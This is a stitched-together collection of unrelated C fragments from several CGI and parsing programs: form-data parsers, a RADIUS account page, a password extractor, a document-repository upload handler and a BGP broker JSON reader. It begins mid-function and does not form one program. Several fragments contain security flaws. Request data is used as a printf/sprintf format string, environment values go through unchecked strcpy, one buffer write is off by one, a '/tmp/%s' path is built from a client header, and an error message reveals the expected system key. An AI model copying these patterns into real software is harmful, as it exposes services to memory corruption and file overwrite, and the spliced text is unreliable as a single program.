cgi_errno = CGIERR_OUT_OF_MEMORY;
CGI_RETURN(cgi_errno);
}
/* Fill in the name slot: */
cgi_entries[which_entry].name =
strdup(strstr(cgi_query,
"name=\"") +
6);
/* Truncate after quote: */
if (strchr(cgi_entries[which_entry].
name, '\"') != NULL)
{
strcpy(strchr(cgi_entries
[which_entry].name,
'\"'), "\0");
}
/* Set default content-type: */
cgi_entries[which_entry].
content_type =
"application/octet-stream";
/* Set default content-length: */
cgi_entries[which_entry].
content_length = 0;
/* Set default value: */
cgi_entries[which_entry].val =
strdup("");
debug("entry.name",
cgi_entries[which_entry].name);
}
}
else if (strstr(cgi_query,
"Content-Type: ") ==
cgi_query)
{
/* Content-type: */
cgi_entries[which_entry].content_type =
strdup(strstr(cgi_query,
"Content-Type: ") +
14);
debug("entry.content_type",
cgi_entries[which_entry].
content_type);
}
}
}
else /* in_multipart_headers == 0 */
{
/* If we're recording into a particular
entry, copy the data: */
if (which_entry != -1)
{
/* Make more room: */
cgi_entries[which_entry].val =
realloc(cgi_entries[which_entry].val,
strlen(cgi_entries[which_entry].
val) + length_gotten + 1);
if (cgi_entries[which_entry].val == NULL)
{
cgi_errno = CGIERR_OUT_OF_MEMORY;
CGI_RETURN(cgi_errno);
}
/* Append the data: */
memcpy(cgi_entries[which_entry].val +
(cgi_entries[which_entry].
content_length),
cgi_query, length_gotten);
cgi_entries[which_entry].content_length =
(cgi_entries[which_entry].content_length +
length_gotten);
}
}
}
}
}
while (length_gotten > 0);
free(cgi_query);
}
else
{
/* Content type is unrecognized! */
cgi_errno = CGIERR_INCORRECT_TYPE;
cgi_content_type = CGITYPE_UNKNOWN;
CGI_RETURN(cgi_errno);
}
}
else if (strcmp(getenv("REQUEST_METHOD"), "GET") == 0)
{
/* For now, assume Content Type of
"application/x-www-form-urlencoded"
(Is this a bad assumption?) */
cgi_content_type = CGITYPE_APPLICATION_X_WWW_FORM_URLENCODED;
/* GET method (data sent via "QUERY_STRING" env. variable): */
cgi_request_method = CGIREQ_GET;
/* Get a pointer to the data: */
cgi_query = getenv("QUERY_STRING");
if (cgi_query == NULL)
{
/* Does the "QUERY_STRING" env. variable not exist!? */
cgi_errno = CGIERR_NULL_QUERY_STRING;
CGI_RETURN(cgi_errno);
}
else
{
/* Determine the content length by seeing how big the
string is: */
cl = strlen(cgi_query);
}
}
else
{
/* Something else? We can't handle it! */
cgi_request_method = CGIREQ_UNKNOWN;
cgi_errno = CGIERR_UNKNOWN_METHOD;
cgi_num_entries = 0;
CGI_RETURN(cgi_errno);
}
if (cgi_content_type != CGITYPE_MULTIPART_FORM_DATA)
{
/* How many entries (name/value pairs) do we need to
allocate space for? (They should be separated by "&"'s) */
cgi_num_entries = 0;
for (i = 0; i <= cl; i++)
if (cgi_query[i] == '&' || cgi_query[i] == '\0')
cgi_num_entries++;
/* Allocate the space for that many structures: */
cgi_entries = malloc(sizeof(cgi_entry_type) * cgi_num_entries);
if (cgi_entries == NULL)
{
cgi_errno = CGIERR_OUT_OF_MEMORY;
CGI_RETURN(cgi_errno);
}
/* Grab each name/value pair: */
cgi_num_entries = 0;
/* (Begin with the first half of the first pair): */
if (cgi_query[0] != '\0' && cgi_query[0] != '&')
{
cgi_entries[0].name = cgi_query;
cgi_entries[0].content_type = "text/html";
}
/* Go through the entire string of characters: */
for (i = 0; i <= cl; i++)
{
if (cgi_query[i] == '&')
{
/* "&" represents the end of a name/value pair: */
cgi_entries[cgi_num_entries].name = cgi_query + i + 1;
cgi_entries[cgi_num_entries].content_type = "text/html";
cgi_query[i] = '\0';
}
else if (cgi_query[i] == '=')
{
/* "=" is the end of the name half of a name/value pair: */
cgi_entries[cgi_num_entries].val = cgi_query + i + 1;
/* plustospace(cgi_entries[cgi_num_entries].val);
unescape_url(cgi_entries[cgi_num_entries].val); */
cgi_num_entries++;
cgi_query[i] = '\0';
}
}
for (i = 0; i < cgi_num_entries; i++)
{
plustospace(cgi_entries[i].val);
unescape_url(cgi_entries[i].val);
}
}
/* Fix any NULL strings to be empty strings */
/* 2.0.4 - MJ Pomraning ([email protected]) */
for (i = 0; i < cgi_num_entries; i++)
{
if (cgi_entries[i].name == NULL)
cgi_entries[i].name = "";
if (cgi_entries[i].val == NULL)
cgi_entries[i].val = "";
}
}
CGI_RETURN(CGIERR_NONE);
}
int getEntries( inStruct Sentries ) {
register int x;
char *stquery, *tmpq, *tmpStr, *tmpStr1, *tmpPtr;
char reqMethod[100];
int msgLength;
char contentType[100];
char boundary[MAX_TOKEN];
int i;
putenv( "HOME=/" );
if ( getenv( "CONTENT_TYPE" ) != NULL ) {
strcpy( contentType, getenv( "CONTENT_TYPE" ) );
}
else {
strcpy( contentType, "" );
}
if ( getenv( "REQUEST_METHOD" ) != NULL ) {
strcpy( reqMethod, getenv( "REQUEST_METHOD" ) );
}
else {
strcpy( reqMethod, "" );
}
if ( getenv( "HTTP_COOKIE" ) != NULL ) {
strcpy( Sentries->cookieStr, getenv( "HTTP_COOKIE" ) );
}
else {
strcpy( Sentries->cookieStr, "" );
}
if ( strstr( Sentries->cookieStr, "*" ) != NULL ||
strstr( Sentries->cookieStr, ".." ) != NULL ||
strstr( Sentries->cookieStr, "?" ) != NULL ||
strstr( Sentries->cookieStr, "/" ) != NULL ||
strstr( Sentries->cookieStr, "\\" ) != NULL ) {
Sentries->op = -1;
return 1;
}
if ( !strcmp( reqMethod, "POST" ) || !strcmp( reqMethod, "post" ) ) {
msgLength = atoi( getenv( "CONTENT_LENGTH" ) ) + 10;
stquery = malloc( msgLength );
if ( fread( stquery, 1, msgLength, stdin ) != ( msgLength - 10 ) ) {
webErrorExit( "short fread", 0 );
}
stquery[msgLength] = '\0';
}
else {
stquery = malloc( QSIZE );
if ( getenv( "QUERY_STRING" ) != NULL ) {
strcpy( stquery, getenv( "QUERY_STRING" ) );
}
else {
strcpy( stquery, "" );
}
}
if ( strstr( contentType, "multipart/form-data" ) != NULL ) {
i = msgLength - 10;
getBoundary( &stquery, boundary );
/*** printf("Boundary:**%s**<BR>\n",boundary);fflush(stdout); ***/
for ( x = 0; *stquery != '\0'; x++ ) {
if ( x == MAX_ENTRIES ) {
webErrorExit( "MaxEntries Exceeded", x );
}
Sentries->m = x;
/*** printf("GettingX:%i....\n",x);fflush(stdout); ***/
tmpPtr = stquery;
if ( getmultipartword( &Sentries->entries[x], &stquery, boundary, i ) != 0 ) {
break;
}
i -= stquery - tmpPtr;
/*** printf("%i:%s=%s<BR>\n",entries[x].size,entries[x].name,entries[x].val);fflush(stdout);***/
}
Sentries->m--;
}
else {
/** the following is to take care of the
home col. name bad length pb Linux on RedHat7 *******/
fixstr1 = malloc( 10 );
free( fixstr1 );
/******************************************************/
for ( x = 0; stquery[0] != '\0'; x++ ) {
if ( x == MAX_ENTRIES ) {
webErrorExit( "MaxEntries Exceeded", x );
}
Sentries->m = x;
Sentries->entries[x].val = malloc( HUGE_STRING );
getword( Sentries->entries[x].val, stquery, '&' );
plustospace( Sentries->entries[x].val );
unescape_url( Sentries->entries[x].val );
char* wd = ( char * ) makeword( Sentries->entries[x].val, '=' ); // JMC cppcheck - leak
sprintf( Sentries->entries[x].name, wd );
free( wd ); // JMC cppcheck - leak
}
}
return 0;
}
int main(int argc, char *argv[])
{
pentry entries[MAXPOSTVARS];
entry gentries[MAXGETVARS];
char *gcl;
register int i;
int cl=0;
ConnectDb();
if(getenv("REMOTE_ADDR")!=NULL)
sprintf(gcHost,"%.99s",getenv("REMOTE_ADDR"));
if(getenv("HTTP_USER_AGENT")!=NULL)
{
if(strstr(getenv("HTTP_USER_AGENT"),"Firefox"))
guBrowserFirefox=1;
}
#if defined(Linux)
gethostname(gcHostname, 98);
#else
//Solaris
sysinfo(SI_HOSTNAME, gcHostname, 98);
#endif
if(strcmp(getenv("REQUEST_METHOD"),"POST"))
{
//Get
//SSLCookieLogin();
gcl = getenv("QUERY_STRING");
for(i=0;gcl[0] != '\0' && i<MAXGETVARS;i++)
{
getword(gentries[i].val,gcl,'&');
plustospace(gentries[i].val);
unescape_url(gentries[i].val);
getword(gentries[i].name,gentries[i].val,'=');
if(!strcmp(gentries[i].name,"gcFunction"))
sprintf(gcFunction,"%.99s",gentries[i].val);
else if(!strcmp(gentries[i].name,"gcPage"))
sprintf(gcPage,"%.99s",gentries[i].val);
}
if(gcPage[0])
{
if(!strcmp(gcPage,"MyAccount"))
MyAccountGetHook(gentries,i);
}
}
else
{
//Post
cl = atoi(getenv("CONTENT_LENGTH"));
for(i=0;cl && (!feof(stdin)) && i<MAXPOSTVARS ;i++)
{
entries[i].val = fmakeword(stdin,'&',&cl);
plustospace(entries[i].val);
unescape_url(entries[i].val);
entries[i].name = makeword(entries[i].val,'=');
if(!strcmp(entries[i].name,"gcFunction"))
sprintf(gcFunction,"%.99s",entries[i].val);
else if(!strcmp(entries[i].name,"gcPage"))
sprintf(gcPage,"%.99s",entries[i].val);
else if(!strcmp(entries[i].name,"gcLogin"))
sprintf(gcLogin,"%.99s",entries[i].val);
else if(!strcmp(entries[i].name,"gcPasswd"))
sprintf(gcPasswd,"%.99s",entries[i].val);
}
}
//Not required to be logged in gcFunction section
if(gcFunction[0])
{
if(!strncmp(gcFunction,"Logout",5))
{
printf("Set-Cookie: iRadiusLogin=; expires=\"Mon, 01-Jan-1971 00:10:10 GMT\"\n");
printf("Set-Cookie: iRadiusPasswd=; expires=\"Mon, 01-Jan-1971 00:10:10 GMT\"\n");
guPermLevel=0;
gcUser[0]=0;
guLoginClient=0;
htmlLogin();
}
}
/*if(!strcmp(gcFunction,"Login")) SetLogin();
if(!guPermLevel || !gcUser[0] || !guLoginClient)
SSLCookieLogin()ยจ;
//First page after valid login
if(!strcmp(gcFunction,"Login"))
htmlMyAccountd();*/
//Per page command tree
MyAccountCommands(entries,i);
//default logged in page
htmlMyAccount();
return(0);
}//end of main()
/* Returns the contents of the password field in a newly allocated
* string, or a negative value on error.
*
* @body: is the string to search the xml field at, should be null-terminated.
* @value: the value that was found
*/
static
int match_password_in_reply(worker_st * ws, char *body, unsigned body_length,
char **value)
{
char *p;
unsigned len, xml = 0;
if (body == NULL || body_length == 0)
return -1;
if (memmem(body, body_length, "<?xml", 5) != 0) {
xml = 1;
/* body should contain <password?>test</password?> */
*value =
strcasestr(body, "<password");
if (*value == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"cannot find password in client XML message");
return -1;
}
/* find terminator */
p = strchr(*value, '>');
if (p == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"unterminated password in client XML message");
return -1;
}
p++;
*value = p;
len = 0;
while (*p != 0) {
if (*p == '<'
&& (strncasecmp(p, "</password", sizeof("</password")-1) == 0)) {
break;
}
p++;
len++;
}
} else { /* non-xml version */
/* body should be "username=test&password?=test" */
*value =
strcasestr(body, "password");
if (*value == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"cannot find password in client message");
return -1;
}
p = strchr(*value, '=');
if (p == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"unterminated password in client message");
return -1;
}
p++;
*value = p;
len = 0;
while (*p != 0) {
if (*p == '&') {
break;
}
p++;
len++;
}
}
if (len == 0) {
*value = talloc_strdup(ws->req.body, "");
if (*value != NULL)
return 0;
return -1;
}
if (xml)
*value = unescape_html(ws->req.body, *value, len, NULL);
else
*value = unescape_url(ws->req.body, *value, len, NULL);
if (*value == NULL) {
oclog(ws, LOG_ERR,
"password requested but no such field in client message");
return -1;
}
return 0;
}
int main(int argc, char **argv, char **envp)
{
int postsize;
char *xmldata, *data;
xmlDocPtr doc;
xmlNodePtr cur, anode;
int bbdnsock;
int bbdnport;
char *status = NULL;
struct config_t maincfg;
/* Read in config file */
maincfg = maincfgopen();
bbdnport = maincfg_get_int(&maincfg, "BLDPORT");
maincfgclose(&maincfg);
key_get(systemkey);
char *request_method;
if (!bbdn_conect(&bbdnsock, "", bbdnport))
cgi_error(500, bstrerror());
request_method = getenv("HTTP_REQUEST_METHOD")!=NULL ? strdup(getenv("HTTP_REQUEST_METHOD")) : strdup(getenv("REQUEST_METHOD"));
// We will handel the post stuf our self. Set REQUEST_METHOD to GET so cgi-util ignores it.
setenv("REQUEST_METHOD", "GET", 1);
if (cgi_init() != CGIERR_NONE) {
cgi_error(500, "Can't init cgi-util");
}
/*
* Either called from command line, and then we want a file.
* or a http get/put
* Or we are handling a web request, and getting the data from stdin.
*/
if ((cgi_getentrystr("method") != NULL) && (strcmp(cgi_getentrystr("method"),"rest") == 0)) {
char api[100], coll[100], url[512];
char *requrle;
if (getenv("REQUEST_URI") == NULL) {
cgi_error(500, "Can't read REQUEST_URI");
}
requrle = strdup(getenv("REQUEST_URI"));
unescape_url(requrle);
sscanf(requrle,"/%[a-z]/%[a-zA-Z0-9_-]/%[^?]", api, coll, url);
#ifdef DEBUG
fprintf(stderr, "api: \"%s\"\n",api);
fprintf(stderr, "coll: \"%s\"\n",coll);
fprintf(stderr, "url: \"%s\"\n",url);
fprintf(stderr, "request_method: \"%s\"\n",request_method);
fprintf(stderr, "reques url \"%s\"\n",getenv("REQUEST_URI"));
fprintf(stderr, "reques url unescaped \"%s\"\n",requrle);
#endif
free(requrle);
if (strcmp(request_method,"POST") == 0 || strcmp(request_method,"ADDDELAYED") == 0 || strcmp(request_method,"PUT") == 0) {
if (getenv("CONTENT_LENGTH") == NULL) {
cgi_error(500, "Can't read CONTENT_LENGTH");
}
// Get data length
postsize = atoi(getenv("CONTENT_LENGTH"));
data = malloc(postsize + 1);
if (data == NULL) {
cgi_error(500, "Can't allocate data.");
}
// Read data
fread(data, 1, postsize, stdin);
data[postsize] = '\0';
// add in to repo
if (bbdn_docadd(bbdnsock,
coll, // collection name
url, // url
cgi_getentrystr("documenttype"), // document type
data, // data
postsize, // data size
0, // lastmodified
cgi_getentrystr("acl_allow")!=NULL ? cgi_getentrystr("acl_allow") : "Everyone", // acl allow
cgi_getentrystr("acl_denied"), // acl denied
cgi_getentrystr("title"), // title
cgi_getentrystr("documentformat"), // document format
cgi_getentrystr("attributes"), // attributes
NULL, // image
0 // image size
) != 1) {
cgi_error(500, "bbdn_docadd() failed. Can't add document.");
}
if (strcmp(request_method,"ADDDELAYED") != 0) {
// close it
sd_close(bbdnsock, coll);
}
asprintf(&status,"Added %s to %s\n",url,coll);
}
else if (strcmp(request_method,"DELETE") == 0) {
if (url[0] == '\0') {
if (sd_deletecollection(bbdnsock, coll) != 1) {
cgi_error(500, "Can't delete collection");
}
asprintf(&status,"Deleted collection %s\n",coll);
}
else {
if (bbdn_deleteuri(bbdnsock, coll, url) != 1) {
cgi_error(500, "Can't delete document");
}
asprintf(&status,"Deleted url %s in %s\n",url,coll);
}
}
else if (strcmp(request_method,"CLOSE") == 0) {
sd_close(bbdnsock, coll);
asprintf(&status,"Closed %s\n",coll);
}
else {
cgi_error(500, "Unknown request method \"%s\"", request_method );
}
#ifdef DEBUG
// Print the envirement so we can better see what is going on.
char** env;
for (env = envp; *env != 0; env++) {
char* thisEnv = *env;
fprintf(stderr, "%s\n", thisEnv);
}
#endif
}
else if ((cgi_getentrystr("do") != NULL) && (strcmp(cgi_getentrystr("do"),"add") == 0)) {
char *data;
int datasize;
int n;
const char *url = getenv("HTTP_X_FILENAME") ? getenv("HTTP_X_FILENAME") : cgi_getentrystr("url");
const char *coll = cgi_getentrystr("collection");
if (url == NULL) {
cgi_error(500, "No url specified. Either set http header HTTP_X_FILENAME or get parameter 'url'.\n");
}
if (coll == NULL) {
cgi_error(500, "No collection specified\n");
}
char *tmpname;
FILE *fh;
asprintf(&tmpname,"/tmp/%s",url);
fh = fopen(tmpname,"wb");
if (fh == NULL) {
cgi_error(500, "Can't open file %s",tmpname);
}
if ((data = malloc( atoi(getenv("CONTENT_LENGTH")) )) == NULL) {
cgi_error(500, "Can't malloc data");
}
datasize = 0;
while ((n = fread ((unsigned char *)(data + datasize),1,1024,stdin)) > 0) {
datasize += n;
}
fwrite(data,1,datasize,fh);
fclose(fh);
free(tmpname);
// bbdn_docadd(bbdnsock, xmldoc.collection, uri, xmldoc.documenttype, xmldoc.body, xmldoc.bodysize,
// xmldoc.lastmodified, xmldoc.aclallow, xmldoc.acldeny, xmldoc.title, xmldoc.documentformat, xmldoc.attributes, image, image_size);
bbdn_docadd(bbdnsock, coll, url, "", data, datasize,
0, "Everyone", "", "omp1", "", "", NULL, 0);
// close it
sd_close(bbdnsock, coll);
}
else if ((cgi_getentrystr("do") != NULL) && (strcmp(cgi_getentrystr("do"),"delete") == 0)) {
const char *url = getenv("HTTP_X_FILENAME") ? getenv("HTTP_X_FILENAME") : cgi_getentrystr("url");
const char *coll = cgi_getentrystr("collection");
if (url == NULL) {
cgi_error(500, "No url specified. Either set http header HTTP_X_FILENAME or get parameter 'url'.\n");
}
if (coll == NULL) {
cgi_error(500, "No collection specified\n");
}
bbdn_deleteuri(bbdnsock, coll, url);
asprintf(&status,"%s deleted.\n", url);
}
else if (getenv("CONTENT_LENGTH") != NULL) {
// Get data length
postsize = atoi(getenv("CONTENT_LENGTH"));
xmldata = malloc(postsize + 1);
// Read data
fread(xmldata, 1, postsize, stdin);
xmldata[postsize] = '\0';
//fprintf(stderr, "Received %i bytes.\n", postsize);
//fprintf(stderr, "Got document:\n%s\n", xmldata);
//parsing xml
doc = xmlParseDoc((xmlChar*)xmldata);
if (doc == NULL)
cgi_error(500, "Unable to parse document");
cur = xmlDocGetRootElement(doc);
if (cur == NULL) {
xmlFreeDoc(doc);
cgi_error(500, "empty document");
}
// Some document checking
if (xmlStrcmp(cur->name, (const xmlChar *)ROOT_NODE_NAME)) {
xmlFreeDoc(doc);
cgi_error(500, "document of the wrong type, root node != %s, but %s\n", ROOT_NODE_NAME, cur->name);
}
if ((anode = xml_find_child(cur, "key")) != NULL) {
char *p;
p = (char *)xmlNodeListGetString(doc, anode->xmlChildrenNode, 1);
if (p == NULL)
cgi_error(500, "No key data");
if ((systemkey[0] != '\0') && (!key_equal(systemkey, p))) {
cgi_error(500, "Keys does not match: Got \"%s\" but wanted \"%s\"\n",p,systemkey);
}
} else {
cgi_error(500, "Did not receive a key");
}
if ((anode = xml_find_child(cur, "version")) != NULL) {
xmlChar *p;
p = xmlNodeListGetString(doc, anode->xmlChildrenNode, 1);
version = atoi((char*)p);
xmlFree(p);
} else {
cgi_error(500, "Did not receive a version number");
}
for (cur = cur->xmlChildrenNode; cur != NULL; cur = cur->next) {
if ((!xmlStrcmp(cur->name, (const xmlChar *) "key"))){
// Ignore
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "version"))){
// Ignore
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "add"))){
xml_add(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "delete"))){
xml_delete(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "close"))) {
xml_close(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "create"))) {
xml_create(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "users"))) {
xml_users(doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "gcwhispers"))) {
xml_gcwhispers(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (const xmlChar *) "error"))) {
xml_errormsg(bbdnsock, doc, cur);
} else if ((!xmlStrcmp(cur->name, (xmlChar*)"text"))) {
//fprintf(stderr, "Got text: %s\n", xmlNodeListGetString(doc, cur, 1));
// Ignore for now
} else {
warnx("Unknown xml node '%s'", cur->name);
}
}
} else {
cgi_error(500, "Didn't receive any command or data.");
}
if (status != NULL) {
printf("Content-type: text/plain\n\n");
printf(status);
}
else {
cgi_error(500, "Reached end of program without status.");
}
return 0;
}
int parse_CGI_encoded(llist *entries, char *buffer)
{
int i, j, num, token;
int len = strlen(buffer);
char *lexeme;
entrytype entry;
node *window;
if ((lexeme = (char *)malloc(sizeof(char) * len + 1)) == NULL)
exit(1);
list_create(entries);
window = entries->head;
entry.name = NULL;
entry.value = NULL;
i = 0;
num = 0;
token = _NAME;
while (i < len) {
j = 0;
while ( (buffer[i] != '=') && (buffer[i] != '&') && (i < len) ) {
lexeme[j] = (buffer[i] == '+') ? ' ' : buffer[i];
i++;
j++;
}
lexeme[j] = '\0';
if (token == _NAME) {
entry.name = newstr(lexeme);
unescape_url(entry.name);
if ( (buffer[i] != '=') || (i == len - 1) ) {
if ((entry.value = (char *)malloc(sizeof(char))) == NULL)
exit(1);
entry.value[0]=0;
window = list_insafter(entries, window, entry);
FREE(entry.name);
FREE(entry.value);
if (i == len - 1) /* null value at end of expression */
num++;
else { /* error in expression */
FREE(lexeme);
return -1;
}
}
else
token = _VALUE;
}
else {
entry.value = newstr(lexeme);
unescape_url(entry.value);
window = list_insafter(entries, window, entry);
FREE(entry.name);
FREE(entry.value);
token = _NAME;
num++;
}
i++;
j = 0;
}
FREE(lexeme);
FREE(entry.name);
FREE(entry.value);
return num;
}
static int process_json(bgpstream_broker_datasource_t *broker_ds,
bgpstream_input_mgr_t *input_mgr, const char *js,
jsmntok_t *root_tok, size_t count)
{
int i, j, k;
jsmntok_t *t = root_tok + 1;
int arr_len, obj_len;
int time_set = 0;
int num_results = 0;
// per-file info
char *url = NULL;
size_t url_len = 0;
int url_set = 0;
char collector[BGPSTREAM_UTILS_STR_NAME_LEN] = "";
int collector_set = 0;
char project[BGPSTREAM_UTILS_STR_NAME_LEN] = "";
int project_set = 0;
char type[BGPSTREAM_UTILS_STR_NAME_LEN] = "";
int type_set = 0;
uint32_t initial_time = 0;
int initial_time_set = 0;
uint32_t duration = 0;
int duration_set = 0;
if (count == 0) {
fprintf(stderr, "ERROR: Empty JSON response from broker\n");
goto retry;
}
if (root_tok->type != JSMN_OBJECT) {
fprintf(stderr, "ERROR: Root object is not JSON\n");
fprintf(stderr, "INFO: JSON: %s\n", js);
goto err;
}
// iterate over the children of the root object
for (i = 0; i < root_tok->size; i++) {
// all keys must be strings
if (t->type != JSMN_STRING) {
fprintf(stderr, "ERROR: Encountered non-string key: '%.*s'\n",
t->end - t->start, js + t->start);
goto err;
}
if (json_strcmp(js, t, "time") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_PRIMITIVE);
json_strtoul(broker_ds->last_response_time, t);
time_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "type") == 0) {
NEXT_TOK;
json_str_assert(js, t, "data");
NEXT_TOK;
} else if (json_strcmp(js, t, "error") == 0) {
NEXT_TOK;
if (json_isnull(js, t) == 0) { // i.e. there is an error set
fprintf(stderr, "ERROR: Broker reported an error: %.*s\n",
t->end - t->start, js + t->start);
goto err;
}
NEXT_TOK;
} else if (json_strcmp(js, t, "queryParameters") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_OBJECT);
// skip over this object
t = json_skip(t);
} else if (json_strcmp(js, t, "data") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_OBJECT);
NEXT_TOK;
json_str_assert(js, t, "dumpFiles");
NEXT_TOK;
json_type_assert(t, JSMN_ARRAY);
arr_len = t->size; // number of dump files
NEXT_TOK; // first elem in array
for (j = 0; j < arr_len; j++) {
json_type_assert(t, JSMN_OBJECT);
obj_len = t->size;
NEXT_TOK;
url_set = 0;
project_set = 0;
collector_set = 0;
type_set = 0;
initial_time_set = 0;
duration_set = 0;
for (k = 0; k < obj_len; k++) {
if (json_strcmp(js, t, "urlType") == 0) {
NEXT_TOK;
if (json_strcmp(js, t, "simple") != 0) {
// not yet supported?
fprintf(stderr, "ERROR: Unsupported URL type '%.*s'\n",
t->end - t->start, js + t->start);
goto err;
}
NEXT_TOK;
} else if (json_strcmp(js, t, "url") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_STRING);
if (url_len < (t->end - t->start + 1)) {
url_len = t->end - t->start + 1;
if ((url = realloc(url, url_len)) == NULL) {
fprintf(stderr, "ERROR: Could not realloc URL string\n");
goto err;
}
}
json_strcpy(url, t, js);
unescape_url(url);
url_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "project") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_STRING);
json_strcpy(project, t, js);
project_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "collector") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_STRING);
json_strcpy(collector, t, js);
collector_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "type") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_STRING);
json_strcpy(type, t, js);
type_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "initialTime") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_PRIMITIVE);
json_strtoul(initial_time, t);
initial_time_set = 1;
NEXT_TOK;
} else if (json_strcmp(js, t, "duration") == 0) {
NEXT_TOK;
json_type_assert(t, JSMN_PRIMITIVE);
json_strtoul(duration, t);
duration_set = 1;
NEXT_TOK;
} else {
fprintf(stderr, "ERROR: Unknown field '%.*s'\n", t->end - t->start,
js + t->start);
goto err;
}
}
// file obj has been completely read
if (url_set == 0 || project_set == 0 || collector_set == 0 ||
type_set == 0 || initial_time_set == 0 || duration_set == 0) {
fprintf(stderr, "ERROR: Invalid dumpFile record\n");
goto retry;
}
#ifdef WITH_BROKER_DEBUG
fprintf(stderr, "----------\n");
fprintf(stderr, "URL: %s\n", url);
fprintf(stderr, "Project: %s\n", project);
fprintf(stderr, "Collector: %s\n", collector);
fprintf(stderr, "Type: %s\n", type);
fprintf(stderr, "InitialTime: %" PRIu32 "\n", initial_time);
fprintf(stderr, "Duration: %" PRIu32 "\n", duration);
#endif
// do we need to update our current_window_end?
if (initial_time + duration > broker_ds->current_window_end) {
broker_ds->current_window_end = (initial_time + duration);
}
if (bgpstream_input_mgr_push_sorted_input(
input_mgr, strdup(url), strdup(project), strdup(collector),
strdup(type), initial_time, duration) <= 0) {
goto err;
}
num_results++;
}
}
// TODO: handle unknown tokens
}
if (time_set == 0) {
goto err;
}
free(url);
return num_results;
retry:
free(url);
return ERR_RETRY;
err:
fprintf(stderr, "ERROR: Invalid JSON response received from broker\n");
free(url);
return ERR_RETRY;
}
